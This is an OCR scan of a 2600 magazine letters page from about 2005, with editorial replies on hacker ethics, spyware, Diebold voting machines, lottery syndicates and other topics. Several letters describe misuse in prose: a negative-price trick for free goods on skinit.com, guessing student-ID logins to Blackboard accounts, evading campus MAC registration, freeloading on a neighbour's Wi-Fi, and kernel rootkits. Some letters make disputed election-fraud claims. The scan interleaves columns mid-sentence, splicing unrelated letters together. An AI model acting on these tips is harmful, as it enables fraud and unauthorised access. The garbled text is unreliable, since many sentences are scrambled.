/Dear 2600: It ain't easy being green. I have noticed through the years how often you refer t o intelligent people as "hackers." Whether or not we have coined the term, i t is still spent describing us. I don't condemn popular culture for its misuse of labels as a way t o better understand its surroundings. However, I do question the morality of a publication with such high standards as 2600 using the term "hacker" so loosely. Perhaps promoting this label is a misinterpretation of what intelligent people do in their spare time. Please correct me if I am mistaken. David Oliver We'd like some more specifics as to how we're using the term loosely. Hackers are curious and inquisitive by nature and will spend an awfully long time trying to find results. That holds true of people writing computer programs, scanning for interesting phone numbers, decrypting algorithms, defeating security systems, and any number of other am'vities. They are all bound together by a quest for knowledge andaren't inclusive or exclusive of any pam'cular age group, sex, race, nationality, etc. Technology isnY even a requirement for the development o f a hacker mindset. But people who have no interest in the actual learning process and are focused instead on stealing, intimidation, bragging, privacy invasion, and other such ends really aren't hackers in our opinion. The mass media may disagree since they consider anyone who touches a computer and then does something bad to be a hacker. That seems to be the epitome o f a "loose" definition. Of course, it's also possible for someone t o have a hacker mindset and then use that ability for evil purposes. But when they make that transition, they pretty clearly leave the hacker world behind. Dear 2600: I was wondering if I could be able t o officially link t o your website from mine. My website is still in its beta form but is going t o be a computer related site. Batman 24 We don't know what you mean by "officially" but regardless, no permission is necessary for you t o link to anyone else on the net. Don't let anyone tell you otherwise. Dear 2600: I recently took a temp job and my employer gave me one of his cards so I would have his cell phone number. On this card were several phone numbers for the company. One of the numbers was supposed t o be a toll-free number t o contact someone about bids/quotes. Instead, when I dialed a computerized voice said "Welcome t o Verizon Wireless Airfone, your connection t o the skies. We are now connecting you t o the aircraft." I did not stay on the line long enough t o see if I would actually be connected t o an airplane as I was trying t o sort out an issue regarding my pay check. Would this have been a toll-free call and if I had stayed on the line would I have been connected t o someone on an airplane? Jason It would certainly appear as if you were about t o be connected to someone on an airplane. You will undoubtedly regret not embarking on this adventure for the rest o f your life. As to how this happened, we suspect your company simply forwarded the toll-free number to follow whoever usually answered i t while they were traveling. ( I t ' s also possible that this toll-free number always goes

to a cell phone and i t was the cell phone that was forwarded. Verizon Wireless Airfone allows Verizon Wireless customers to forward their cell phones directly to their seats on airplanes and bill calls from t h e plane to their cell phones a t much lower prices t h a n non-Verizon customers. (We suspect there must be numerous cases o f people who forget to "unforward" t h e i r phones when they leave the aircraft. We're curious whether or not subsequent passengers wind up gem'ng all kinds o f unwanted calls as a result.)


Dear 2600: I am under the impression that current cell phones are GPS enabled for "emergency" location by those who w a n t t o locate them. I f this is true, can t h e GPS function and phone location be displayed on t h e user's handset? Sometimes I too would like t o know where I am. DP Most recent cell phones do have a GPS receiver (assisted GPS, to be more specific) contained within and are usually clearly marked as having such a device. They are as a rule only acfivated when using t h e E911 sem'ce and are not continually receiving coordinates when an emergency call is not in progress. However, there is generally an admin/debug menu which allows f o r testing o f the device and therefore displaying your coordinates. The method varies greatly based on the rnake/model ofyour cell phone, but there are often instructions to do this posted online. Dear 2600: When I send you guys articles w i l l you edit them? I mean, I spend more time editing t h e m than I do writing them. Would you be ever so kind as t o do that for me, or is that my job? William All articles are edited for clarity and various other things. It's yourjob t o make your article as literate, factual, and interesting as possible. It's a lot less likely to even be considered i f it's painful t o read. Dear 2600: I am a former employee of a company that I want t o write an article about. One thing I am worried about though is having them discover who wrote i t . What kind of protections do you offer for those who submit articles? Do you ever reveal where an article came from? Dave We have never revealed the author o f an article to any authority or outraged corporation. However, people have been tracked down because o f t h e byline they used. So be very careful what you select a s your byline i f you want to stay anonymous. Be aware t h a t sometimes your username (not your full email address) may wind up becoming your byline i f there's no other name given and no request for anonymity. Be sure t o make any such requests in the same submission as separating them will increase the odds that the wrong byline will be used. You should also be careful where you make submissions from. I f y o u want t o make a submission concerning a particular company, it's not a good idea to use their mail servers t o send i t from. Also, be aware that using encryption won't necessarily help you in such a case a s the fact that you sent email t o am'cles@2600.com will still be registered (this incidentally is the only email address that accepts am'cles). An anonymous remailer would fix that but




/might raise other flags within the organization. We generally prefer cleartext ASCII from an address that you will be reachable a t for some time. Many encryption attempts wind up using incompatible keys o r versions and we very quickly lose patience when there's a huge pile o f articles to go through.

Dear 2600:
My friend has a sister who i s paranoid. She installed a spyware program called " I Am Big Brother." He wants t o get rid of it because it logs everything he does. Does am anyone know any vulnerabilities? I going t o get rid of it myself at our school and he thinks it would be a good idea.

We've been running a number o f am'cles about detem'ng and removing spyware. There are different methods for different programs. We're certain this one can be defeated as well. We can only hope that the irony o f a sister running a program called " Am Big Brother" and I creating paranoia to address her own isn't lost on anyone. Incidentally, the program can be found a t http://www.iambigbrother.org/.

login, the student would use his/her "NC Wise" numbe? (student ID number) as both their username and their password. I n Wake County, a l l the students' NC Wise numbers start with 20, and then there are four random digits after 20, like 201234 or something. Therefore anyone could enter 20, four random digits, and then get access t o that student's grades and personalinformation. I tried a few myself and even accessed a teacher's account! If Ihad wanted to, I could have changed a l l of his class's assignments, not t o mention his own password so that he could not login. I j u s t wanted t o warn the community about Blackboard which is used i n schools nationally. Students who use this and have the same login requirements as Wake County does should change their passwords for better security.

Public Display
I n a system as badly designed as this, one really has an obligation to demonstrate these monumental flaws. The irony is that anyone doing this would be blamed for the privacy invasion rather than those who designed this travesty. W hope this opens some eyes and we invite e anyone else living with such poor security to l e t us know.

Dear 2600:

Dear 2600:
There i s a neo Nazi site currently distributing tens o f thousands of hate music filled CDs. Please let the 2600 network know. I hope t h a t someone w i l l choose t o t r y know it's against many hackers' and shut down this site. I ethics to wreck people's sites, but I hope that someone will make an exception i n this case. We have t o stop these kinds of evil people! Please use t h e power of your group to rid the world of an outlet for f i l t h and hatred. I only know about 2600from online wanderings back i n high school. I have no computer skills or hacker friends. You guys were the only thing Icould think of t o stop this. Please help!

There i s a State of CaGfornia website t h a t lets you submit a license plate or VIN number t o show the smog certifications for that vehicle. When you enter a VIN or plate it shows both the VIN and plate for that vehicle. It makes it easy for car thieves t o stamp out fake VIN tags t o match the plate. The site is a t http://www.smogcheck. sca.gov/vehtests/pubtstqry.aspx.

Why such information is available t o the world is beyond us. But it enabled us to learn that there used to be a 1989 Buick Century out there with a "2600" plate that has since changed to a more normal plate, possibly due to a sale. By what twisted logicshould anyone i n the world be able to have access to this information plus a whole l o t more?

Think about what happens when someone tries this tactic on us. We wind up getting more support than ever before from people and places we never would have been i n touch with ordinarily. By attempting this on others, you're opening up the same type o f support for them. I n other words, you'll be making them stronger. You should have the ability to counter hate speech with words and logic, rather than resorting to desperate measures. You need to be attacking the cause o f the problem, n o t j u s t the symptoms. The assumption that shum'ng down sites is what hackers are all about simply strengthens the inaccurate mass media perception o f us. Any idiot can use brute force to try and shut someone up. Let's hope that we're all a few steps above that.

Dear 2600: I want t o thank you with a l l my heart for your steady
voice against war. I f TAP was s t i l l publishing, I believe they might be holding strong as well. But so many others have caved. Disheartening t o say the least. I joined the army right when Operation Sundevil began (probably beating politicalimprisonment by t h e skin of my teeth) and I've always known how many from your readership are conservative libertarians. So it takes guts for you t o speak out. Thanks for being you.

marco (aka prime anarchist)
You're welcome. But we doubt we've cornered the market on opposing the senseless waste o f human life. There are many "conservative libertarians" speaking out as well.

Utter Stupidity
Dear 2600:
I a high school student i n Raleigh, NC. My high am school belongs t o the Wake County Public School System and they use Blackboard for online teacher-student relations. On Blackboard a student can login and access their grades for certain classes, read announcements from their teachers, and turn i n assignments electronically. I was introduced to this system i n my Programming I1 class \ a n d Ithought it was kind o f strange that i n order t o

Dear 2600: I wanted t o write t o say that I picked up my first just
copy o f 2600a few days ago and read it over. For the last two years Ihave developed a love for computers and have wanted t o know everything I could possibly learn about them. I don't know much but I know more than most around me. I owe part of that t o people like the



saying a friend bought it. He proceeded t o ask me i f I knew what the magazine was, what 2600stood for, and a host of other questions. Immediately I felt bad for lying. He seemed t o be genuinely excited a n d knowledgeable. Inever caught his name, though h e did mumble his Robbie Brewer alleged former phreaker handle. He went on t o talk Dear 2600: about Cap'n Crunch, blue boxing, red boxing, trunk dialI just wanted t o let you guys know that Ilove the ing, the meetings a t Union Station here i n Los Angeles, just might name my first magazine. Ilove it so much I how he may have single-handedly driven Sprint t o switch born "Twenty Six Hundred." I'm saving for the "all back from five digit authorization codes t o seven t o 14, and issues and lifetime subscription" deal. Question: How how he never bothered t o learn computers because he long will those "special prices" last? was afraid he'd be a danger t o society and himself. I Rob Hundred almost wish I could have ridden t h e rest o f t h e way with The prices go up occasionally as more back issues behim, but my stop came before his a n d Iwished him a come part o f the package. But we'll always try to have good day. good deals for people o n our Internet store Of course, part o f me is skeptical. Though he was (store.2WO.com). We suggest buying them before your quite convincing, I can't help but wonder if he truly was first born grows up and kills you for giving him/her that a part of the phreaking scene. And if h e did f a l l through name. the cracks, how? And why? Maybe w e ' l l cross paths ancan other day, and I treat him t o lunch and hear his stoSecurity Issue ries. Or maybe someone reading this knows exactly who I'm talking about. Either way, it definitely made for an Dear 2600: interesting morning and I thought I'd share it with you. Entering my third decade of paranoia I some web did aaron searches through google t o find out how "far outthere" I Yet another instance o f our shirts bringing people am. Not using complicated google hacks or anything like together. that I simply used my paranoia and hatred of "big brother" t o aid me. A few years ago I realized that everyDear 2600: one will be arrested, jailed, or ticketed for the most miSix year reader, first time writer. I have a confession nor offenses but the paper trail has made its way online. t o make t o you guys: I'm addicted t o free Internet. I've Just about every police department, jail, or correctional been accessing my neighbor's wireless high speed Interfacility has a website and often posts the offenders onnet connection for about a year now. It started off small line including name, age, phone, and (gasp) Social Secua t first, just an HP Pavilion laptop w i t h a Linksys wifi rity numbers so i f you were t o dive into these records you card. I would only connect t o the network when I exwas could trace someone back as far as the early 90s and pecting an important email and t h e like. But then I have more than enough evidence t o steal their identistarted connecting all the time and staying connected. It ties. got worse. When the signal wasn't strong enough and Brian wouldn't connect me, Iwould get t h e high speed withI f it wasn't so sad it would be funny that these orgadrawals. Ihave since gotten greedier and now have a nizations are giving such ammunition to future potential network of two PCs, two printers, a range expander, said criminals. This seems to be y e t another way that prisonlaptop, and Ieven have plans t o b u i l d t h e "Cantenna" ers are being punished above and beyond their actual (www.oreillynet.com/lpt/wk~/448), a l l running wiresentences. lessly and connected t o my neighbor's Internet. The would never have learned all the things paradox is this: I Experiences I t o set up this pirated network if t h e y had simply sedid cured their router properly. It's n o t m y fault that when Dear 2600: installing their connection, they j u s t clicked "Next" 15 I've worn my 2600 shirt on many occasions, not t o times, is i t ? I've never actually damaged anything on show off but t o support the magazine and the informatheir end and I have no intention o f doing so (even tion it disseminates. As a NOC monkey on Telco Alley i n though they had logs disabled, so t h e y wouldn't know find public transportation the best way downtown LA, I had what went wrong anyway). Just a random thought I t o get t o and from work and, while the thought of being today. Thanks for listening. Keep up t h e great work guys. accosted for having a shirt with the word "Hacker" on it Mi key B has crossed my mind, I've never cared enough not t o wear it on my way t o work. Observations This morning, halfway t o work, an uncannily friendly vagrant hoped on the bus. His glasses missing a Lens, Dear 2600: While Iwas visiting a well-respected drive-cloning hair disheveled, and his suitcase covered i n layers of discarded plastic, he carried his three string guitar i n one company's website, Inoticed an interesting ad. The ad hand and wheeled the suitcase i n another, excusing himflashed an image of a young girl and t h e n commented on self and politely notifying people t o watch their toes. His how they were fighting child exploitation. Another picdemeanor struck me as odd, only because I've spent the ture of a building blowing up and a comment that they past three years of my life being hardened by literally inwere fighting terrorism. The next picture was of a cop sane vagrants riding the bus. holding weed arid the note that drug use is a t an all time high. The last frame was the one t h a t intrigued me. The Suddenly, while gazing out the window I hear a ("2600! Oooooh! I s that your shirt?!" Instinctively I lied, caption read "Hackers cost the world economy billions"


/and the image was of a computer screen with the 2600 website loaded. I was surprised t o see that as I am an avid fan of 2600 and know that you don't promote the malicious use of information. Keep up the good work, guys! k~ l e Even more unbelievable than the existence o f this site is the fact that you didn't tell us its name. Fortunately, other readers shared this info. Dear 2600: I suspect you are aware of this but if not: 2600is featured as one of the evils in the ad at http://logicube.com u/products/hd-duplication/md5.asp. scotk It's amazing to us that terrorism, child exploitation, drug trafficking, and white collar crime are all represented with generic images but when i t comes to "cyber crime," they have no problem sticking our name up there in lights. While most other organizations would contemplate legal action, we'll simply issue a standard Level One electronicjihad. We mustn't disappoint after all. Dear 2600: I was recently looking around on www.skinit.com for cell phone or PDA skins. I was looking at the skins for the Sidekick I1 and went through the whole purchase process without the intent of actually buying (probably because I don't even have a Sidekick). But there was one thing I noticed. When you buy a skin you choose the picture you want the skin to have and at the bottom of the window i t has a space that shows the price (usually $0) and then i t charges you $9.95 for the skin itself. What I realized is that if you type "-9.95" in the price space i t will take that off the final order. This is a way t o get all the skins you want for free (or at Least until one of the skinit employees reads 2600). Maybe you can even make money off of this! SystemDownfall Maybe you can even start a life of crime just by typing in some numbers on a web page. This is an example of a really poorly designed interface, many of which exist on the net. Or i t could be a really well designed interface to compile a database of dishonest people. Dear 2600: Check i t out ... M S teaches parents t o understand their children's "133t speak" - http://www.microsoft.com ~/athome/security/children/kidtalk.mspx. Doda McCheesle This is a must read for anyone who wants to laugh all night. We wonder i f future archaeologists will be studying this language with the same attention given to ancient Greek. Some highlights: "While it's important to respect your children's privacy, understanding what your teenager's online slang means and how to decipher could be important in certain situations and as you help guide their online experience. While i t has many nicknames, information-age slang is commonly referred to as leetspeek, or leet for short. Leet (a vernacular form of 'elite7 is a specific type o f computer slang where a user replaces regular letters with other keyboard characters to form words phonetically creating the digital equivalent of Pig Latin with a twist of hieroglyphics.

"Leet words can be expressed in hundreds of ways us? ing different substitutions and combinations, but once one understands that nearly all characters are formed as phonemes and symbols, leetspeek isn't difficult to translate. Also, because leet is not a formal or regional dialect, any given word can be interpreted differently, so it's important to use discretion when evaluating terms. The following serves as a brief (and by no means definitive) introduction to leet through examples. "Numbers are often used as letters. The term 'leet' could be written as '1337,' with '1' replacing the letter L, '3'posing as a backwards letter E, and '7' resembling the letter T. Others include '8' replacing the letter B, '9' used as a G, '0' (zero) in lieu o f 0, and so on. "Rules of grammar are rarely obeyed. Some leetspeekers will capitalize every letter except for vowels (LiKe THiS) and otherwise reject conventional English style and grammar, or drop vowels from words (such as converting v e y to 'vy7. "Mistakes are often left uncorrected. Common typing misspellings (typos) such as 'teh' instead of the are left uncorrected or sometimes adopted to replace the correct spelling. Leet words o f concern or indicating possible illegal activity: 'warez' or 'w4r3z8:Illegally copied software available for download. 'h4x1: Read as 'hacks,' or what a malicious computer hacker does. 'prOn? An anagram o f porn,' possibly indicating the use of pornography. 'sploitz' (short for exploits): Vulnerabilities in computer software used by hackers. 'pwnc:A typo-deliberate version of own, a slang term often used to express superiority over others that can be used maliciously, depending on the situation. This could also be spelled 'O\/\/n3d1 or 'pwn3d,'among other variations. Online video game bullies or 'griefers' often use this term." Dear 2600: This letter is for informational purposes only as I don't have enough knowledge of the legahties t o say whether or not you could possibly get in trouble for it. On that note, access rules may vary from campus t o campus. I n this example I will use Michigan State University's network, due t o the fact that I have personal experience with their network. But many college campuses are set up similarly. When you first connect your computer t o the ethernet ports on campus (anywhere around campus), you are prompted t o enter a username and password (provided by the school and tied t o your academic account). This is fine for most people. When you enter your name/pass you will be linking your ethernet MAC address t o your account. You are allowed t o register multiple MAC addresses, but the point is that they all tie t o your student account. To get around this ( I personally don't like having my Internet behavior tied t o my student account), get a used network card. On college campuses there are always people looking t o sell used computer equipment. At MSU, we have an active student community with classified ads. When purchasing a used ethernet card, there is a very good chance that the last owner didn't remember t o remove the registration from his/her card before EL00




(elling it. Pop that i n your machine, plug in, and you should be able t o stay away from easy tracking. Like Isaid, many other universities use the same MAC/account registration. Just something t o think about. Impact Dear 2600: Check out the hacking/puzzle game on www.ninebows.com. There are nine steps and it seems like nobody can get past t h e second. Google it and you can find some really long forum threads about it too.

the Chapters, it was shown on my b i l l as "2600 Hacker found terribly interesting. Quart" which I Freezing Cold 2600 Fan


Dear 2600: Saw a letter i n t h e latest issue o f 2 6 0 0 t h a t this guy can't get it a t Chapters i n Canada. Just s o you know, I get it there a l l the time, including this issue. Terry That's a pretty neat trick.

Dear 2600: I t ' s a good way to lose your mind without having to I enjoyed reading t h e mathematical analysis i n How leave the house. t o Hack the Lottery (21:3) but Iexpected more from Dear 2600: 2600and was disappointed the author failed t o take i n t o Not only i s Ikea a great store t o buy stuff, it's loaded account t h e human factors i n t h e equation. with workstations t o lay their products out on. Although The author i s correct t h a t you c a n n o t fundamentally I didn't play too much, I able t o connect t o t h e other was change the odds but what you can do i s balance t h e risk XP PCs on the network, go i n t o the C drive, change the t o reward ratio. The purpose o f a l o t t e r y syndicate i s n o t put screensaver (but I it back), and create and delete a t o increase your odds of winning b u t t o share both t h e test text file on t h e desktop. risks and the rewards over t h e long run. I feeling a b i t paranoid so I was didn't bring up IE or He also says there i s no need t o s t a y away from patwrite down the IPS but Ihave a feeling it would have terns as all numbers have an equal chance o f coming up. couldbeen fun. During t h e rest of my visit i n the store I While t h a t is true on one level there w i l l always be some n't spot a single security camera. Imust go back and people playing t h e obvious patterns l i k e 1,2,3,4,5,6. Although t h e odds are no difference if you did win you play. Rifkey would have t o split t h e prize with many more people. I f you want t o t r y and maximize your p o t e n t i a l winnings it Dear 2600: helps t o pick a combination that i s n o t t o o likely t o colI stumbled on sort o f a "security through obscurity" lide with other people's choices. It i s a llabout balancing type approach t o securing a SOHO router, such as a the risks against the rewards. linksys. As you know, most SOHO routers have an interHaving said all that, it i s worth remembering t h e face which i s accessible through port 80 or http://ip-adquote: "The lottery is a tax on t h e mathematically dress which is sometimes accessible publicly. To drive challenged." away people attempting t o login t o your router (you obAlan Horkan viously want t o change the default password), you can Dublin, I r e l a n d also forward port 80 t o a machine that doesn't exist. The author o f the piece, Stankdawg, replies: When they t r y t o login t o your router they w i l l be given "A 'lottery syndicate' is a term t h a t simply refers to an error message that the host was not found. Just an people gem'ng together i n a group t o t r y t o increase added layer o f protection. their chances o f winning b u t a t the risk o f having to p4p3r t l g 3 r share the payout with the other members. I t is exactly what y o u describe, a risk-to-reward approach o f playing. Dear 2600: I absolutely touched on this in m y a r t i c l e i n the first I looking around at archive.org, and noticed that was paragraph under the header 'Myths' since it is a very you can submit a URLand they will bring up archived vercommon theory. typed www.2600.com and found quite sions o f the site. I T used a small example o f a 'syndicate' referring to a few older versions I was browsing one of t h e older versions of your site and saw the link: "Mirror DeCSS." I office pools o f lottery players. Choosing 2 0 picks o u t o f almost 1 6 million is still pretty small, b u t b y increasing clicked on it and sure enough they have a l l of the mirrors the syndicate y o u could continually increase your still linked, even though you were forced t o take chances o f winning right up to the p l a y every number' them o f f of your page I just thought you might find theory. A t the same time, however, you are causing the this interesting. Iwonder i f the MPAA is going t o sue amount o f winning to decrease due t o the shared winarchive.org as well for archiving a page with "illegal nings with each additional syndicate member. This is a content." true statement. Some people who believe i n this drlecter myth/theory think that they will win m o r e frequently due to the odds being better (keep i n m i n d t h a t they are still Dear 2600: phenomenal) and even if they have t o share it, it will pay Just wanted t o let the fans of 2600 know that Canada o f f in the long run through repeated small wins o r one is certainly still.selling t h e magazine. I n fact, i n Southb i g win. happened i n t o a Coles Bookstore (in Brantern Ontario I "The problem here i s that it is j u s t as much o f a theford) and Chapters (in Ancaster) and found copies i n ory as everything else. I t will take l o n g term analysis to suspect the other stores that were both locations. So I visited may have been sold out or had the copies hidden decide whether it does pay o f f i n t h e l o n g run. Without going i n t o the business viewpoint t h a t money that doesaway. I n both locations 2600 was displayed clearly i n the ( f r o n t row of magazines. When Ipurchased my copy from n't earn interest is actually losing m o r e money, I will






3 4 '

/;imply point a t the facts. Do a search for 'lottery s y n d t cate wins lottery' and you will n o t find any large syndicates winning any Large amounts o f money with any regularity. I would debate that any individual wins b y a syndicate were b y random chance more than any 'system.' "Looking a t the facts, I simply do n o t see enough evidence to say that syndicates are any more successful then individual groups. I a few office groups that saw won the lottery, b u t this happened without any large syndicate effem'veness. I f these syndicate systems worked, wouldn't more people have seen and heard about the success stories? I t is kind o f hard t o hide a pattern o f success i n winning the lottery! These were small office groups with only one that was over 3 0 people. Even then, it was the same simple luck b y which individual winners have won. Even if a syndicate o f 500 people won I 0 million dollars, when you split that up they get $20,000 each. Most syndicates look to be around 50 people i n number depending on the lottery i n question so that they guarantee smaller wins while hoping for 'the b i g one.'It is definitely an increase i n your odds which I stated i n my article, b u t it is still ridiculously stacked against you no matter what. "Common sense comes into play here. I f a syndicate were really that effecfive, don't you think the lottery would rig it with more numbers to nullify that effecfiveness? Trust me, they have done their homework and they are glad to let the syndicates pump up the jackpot for them. They know that i n the long run, they will always win. "In m y opinion, if I were going to play the lottery, I would take my dumb luck chance a t a 1 0 million dollar payday than sharing it with 499 others. Of course this is will my opinion, and others may disagree. But I keep my money i n my pocket. "

i n 21:4. I'm an Australian too, so Inormally write the\ date dd-mm-yyyy. WhiteHat seemed t o think that this was another logical suggestion but he's completely wrong. On a computer if you write the date as dd-mm-yyyy, files end up out of order. 01-01-1985 comes before 1212-2004 (files from each year would be mixed up with each other). Whitehat's response is a bit pointless, but mostly annoying. BitPirnp

Dear 2600: Imissed the original article but am responding t o the Letter by WhiteHat i n t h e current issue of 2600 (21:4). Whilst you find dd-mm-yyyy logical and familiar, the main objection t o that format is that for the first 12 days o f every month it is impossible t o t e l l if the date is i n ddmm-yyyy or i n mm-dd-yyyy format with obvious consequences. With the date written like 2005-03-01 this i s always yyyy-mm-dd because no one uses yyyy-dd-mm a t all. There is only one interpretation for that date. This has already been decided i n International Standards such as IS0 8601, and earlier IS0 standards back as far as 1971; and i n Internet RFC documents such as RFC 3339. Many programs, applications, data formats, and websites already use the "new" format and there i s a large amount of information about this topic t o be found on the Internet. splke Dear 2600: Iam writing i n response t o Jeff's letter i n 21:4 regarding hacking a voting machine. Hacking a voting machine is such a minor issue compared t o corruption. It's no coincidence that Diebold's new touch screen voting machines have no paper trail. Diebold also makes ATMs, checkout scanners, and ticket machines, all of which log each transaction and can generate a paper trail. It is also not mathematically possible for uncorrupted machines that a l l (not some) of the voting machine errors detected and reported i n Florida i n 2000 were i n favor of Bush or Republican candidates. However, that i s what happened. It's also no coincidence that Walden O'Dell, Chairman and CEO of Diebold is a major Bush campaign organizer and donor who wrote i n 2003 that he was "committed t o helping Ohio deliver i t s electoral votes t o the president next year." It's also no coincidence that exit polls i n Ohio during t h e general election i n 2004 showed Kerry should have taken Ohio by four points, yet the votes actually recorded gave Ohio, and thus the country, t o Bush. It's also no coincidence that votes recorded i n eight of the other ten battleground states differed from exit polls by between 2.2 and 9.5 points, and a l l discrepancies (not some) favored Bush (an impossible anomaly). Note that this is not a partisan issue. I'm a registered Republican. But that is n o t t h e point. The point is that t h e public vote doesn't count i n the U.S. since the election appears t o be rigged. The hackers are the ones who wrote t h e software for the voting machines i n the first place. No need t o pick the lock on just one voting machine.

Dear 2600: My letter is i n response t o LabGeek's letter i n 21:4. I had the privilege of working as part of the management team of a new Wal-Mart i n the Northeast. The yellow line i s drawn as a guide for shoppers so they can visualize where the border is. The actual border i s created by a wire running underground. The system is based on RF, though Ido not know the actual frequencies or t h e range. We have tried lifting the carts a foot o f f t h e ground, but the locks still engaged. Amusingly, per 2600's response, we were successful i n getting over the barrier by lifting the carts above our heads. Jaypoc Dear 2600: It looks like the article i n 21:l ("Setting Your Music Free") and the response i n 21:3 from Cameron both mistakenly refer t o AAC codec as an Apple Product. The AAC (Advanced Audio Coding) was developed by Dolby Labs and is integrated into MPEG-4. Apple is merely an early adopter of the technology, incorporating MPEG-4 i n t o their latest QuickTime, making it the default codec i n iTunes, and adding support for it i n their hardware players. Alop Dear 2600: First off guys, great mag, radio show, con, DVD.... I'm writing about WhiteHat's letter about date format ,


Please withhold any identification for fear of Government retribution. I t ' s hard to believe that it's this cut and dry. For one thing, it would be monumentally stupid for one party to have this kind o f control and t o attempt any sort o f corruption. Yet there are confirmed reports that are hard to excuse. We can only hope that this is thoroughly investigated and that the truth will come out.

Jeez, some people w i l l believe anything.


Daniel Gray Defiance, Ohio
Let us start b y saying that's t h e coolest sounding name o f any city i n America. As for t h e Diebold issue, there are simply too many weird things g o i n g o n to be ignored. The lack o f open source software, paper trails, o r overall accountability i s troublesome a t best. The issues you cited have n o t been resolved as n e a t l y as y o u seem to think. And we couldn't find t h a t q u o t e from the media y o u cited above anywhere. Put simply, this i s n o t about Republicans and Democrats. I t ' s n o t a b o u t the Netherlands. I t ' s about setting u p the most i m p o r t a n t computer system i n our nation's history and d o i n g it in a way that's fair and accountable to everyone. This isn't accomplished through secrecy. As long as such secrecy exists, there will always be doubts and there will always b e rumors. I f you want these to go away, then t h e r e has t o be some level o f accountability. And so, we propose t h e following t o Diebold: l e t us hack your machines a t t h e next HOPE conference i n 2006. We will operate t h e system as if we were an election board. We will try t o cheat. We will try to create problems o f a l l sorts. And i n t h e end, we will l e t everyone know what we learned. What possible reason could there be for n o t accepting such a challenge?

Dear 2600:
There needs t o be a correction i n Purplesquid's letter (21:4). The way he gave the information was lackluster a t best and totally out of context a t worst. While indeed a voting machine had 4258 votes on it i n Ohio, it was located and the votes were deleted two hours beforethe polls even opened according t o the U.S. and State Election Boards and documented by both t h e Democratic and Republican National Committees. Squid gives the impression that these votes were counted and that is totally false. According t o all the investigations by the press and the Federal Election Commission, there was no difference between the results with t h e paper trails and the states that didn't have paper trails. Seems t h a t Squid's information is yet again i n error. I n Baker County, Florida, there again was no problem with t h e vote. I n t h e last eight presidential elecfions, the voters i n this county have repeatedly gone t o the Republicans and this has been documented so by none other then the Florida State Election Commission and t h e U.S. Federal Elections Commission and the results are on file a t the U.S. Library of Congress (http://www.loc.gov). Considering that it is a federal felony i n the U.S. t o falsify these forms, Ihighly doubt that any sane person would want t o spend any time i n prison because o f this for any reason. This means that every presidential election from Carter through Reagan-Bush-Clinton and back t o Bush has been documented i n this county, and t h e people who did the investigation were the Florida Democratic Party with help from the Democratic National Committee. Yet another myth being passed around as true i n a country that has tried t o get U.S. forces out of other European countries by any means possible since t h e end of WW2, and forget the simple fact that these countries have asked us t o stay. Could it be that t h e Netherlands are pissed they do n o t have any U.S. bases there, and as such do not receive any benefits from same? Like sales and taxes? Now while hacking a Diebold machine was widely reported on t h e net as being possible, even ABC-NBC-CBSCNN all admitted that they Tumped t h e gun on this story and had no f a e u a l data t o back this up nor prove it ever happened." And the people that said they hacked this machine were unable t o do it i n front of witnesses. Now isn't that strange that you can hack something only once? Once you have your way in, unless the whole machine i s reprogrammed (and this machine was not as it was placed under lock and key after t h e hacking was stated), then why couldn't these people hack this with witnesses watching? Something stinks i n t h e Netherlands and methinks it is what PurpleSquid is being told. Maybe PurpleSquid should stop reading magazines i n the Netherlands that are equal t o t h e supermarket tabloids (Enquirer, News o f the World, Star, etc.) here i n the States, and pay more attention t o information that can actually be used, like your magazine.

Dear 2600:
I n response t o Forgotten247's a r t i c l e i n 21:4, utilizi n g several tools available on t h e open market (such as sysinternals.com) and having a detailed knowledge of a baseline Windows system (which I assure you, many security professionals do), your stealth methods are ill conceived and negligible. If you really wish t o create a stealth application that cannot (easily) be found, you need t o create a kernel Level rootkit t h a t can interrupt system calls (both Windows API and Raw) t h a t request information for t h e program files a n d process information i n question. I f you can p u l l t h a t off, then t h e only wav t o semi-ieliablv detect vour "hidden" orocess would b e t o do a f u l l disk analysis From a different 0s. Now it is still possible theoreticallv t o hide t h e f i l e from even this. but t h a t would take a l o t o f research a n d i n depth knowledge of file systems, t h e registry, a n d t h e like. Best o f luck on your stealthing endeavors. B y t h e way, a virus scanner would detect your "stealthing" methods as soon as a copy of the exploit made it across t h e desks o f any relevant researcher. Possibly sooner.

The Stealthed One (yeah, Right!) Dear 2600:
Thanks for your words i n t h e "Stick Around" piece i n 21:4. I was beginning t o feel a little overwhelmed, as I ' m sure we all do a t times. What you said was just what I needed t o hear. It's good t o be reminded t h a t we are, i n fact, legion. The greed-mongers, fascists, warlords, megalomaniacs, and those who spread fear for their own gain will realize thatthey're t h e ones w h o should be worried. After all, there really are a l o t m o r e o f us than there are of them. The power is i n a l l our hands. Their only real power lies i n our own self-doubt. You know t h e quote about good men doing nothing. Well, I ' m going t o do my part. Thank you again for your words o f encouragement and, of course, for your truly rad a n d absolutely necessary publication.


ear 2600:
I finished reading battery's great article on Tickjust etmaster i n 21:4. I tickets there frequently and I buy was wondering if anyone out there has had t h e chance t o look under the hood of t h e virtual waiting room system. Ihave been trying t o figure out the mechanism that specifies your place i n "line." Also, concerning Cabal Agent # l ' s response t o Zourick about Linux systems i n the federal government i n 21:4: Am I the only one who is annoyed by the half page of bureaucratic acronyms that boldly proclaims that applaud the agenLinux is not certified for federal use? I cies and the admins that are using Linux without authorization! Especially since common citizens like you and me are footing the bill for massively over-architected systems that are designed by these bureaucrats who have no incentive t o do things cheaply. Ski l l c r a f t

turned the pages. So just t o be cautious I placed the ma> discreetly i n my bottom drawer and saved the reading for was sure no one was looking. I returned t o later when I my drawer three hours later t o find that it was none other than George W. Bush himself who was watching me! I would just like t o read one issue i n peace. jason Dear 2600: While sitting i n class reading 21:4, Iread a Letter flipped about subliminal messages i n the cover art. So I the magazine over and under the Lighting I the word saw moved "erase" on the closest tombstone. Enlightened, I it under the light t o see I f I could find anything else. Then a l l of a sudden Bush's face appeared and scared the crap out of me. I normally don't Like t h e sight of him a t any time so suddenly seeing him hidden i n the cover surprised me a bit. Once I got home from school I it unput der a black light which makes the words very apparent. I also scanned 21:2 and I the word "OBEY" and i n 21:3 saw Isaw "PROTECT" written i n it. Iwill now be scanning every issue for more surprises. mr-bloko Dear 2600: Thanks for such a great magazine and a beautiful picture of good ol' G on the cover. So patriotic, yet so very W scary! Alex Dear 2600: Ido not usually write but had t o say something. I saw something. I thought it was a stain left by my drink on the cover of 21:4. However, it was a different type o f stain. I n the right corner. Startled me. Thanks for the great magazine. miles bogus Dear 2600: Honor. Obey. Protect. Erase. Bush? DigitalDesperado Dear 2600: I really dig the UVink used Lately. I've noticed it for a while and since nobody else has said anything (other than the fact that sometimes they see 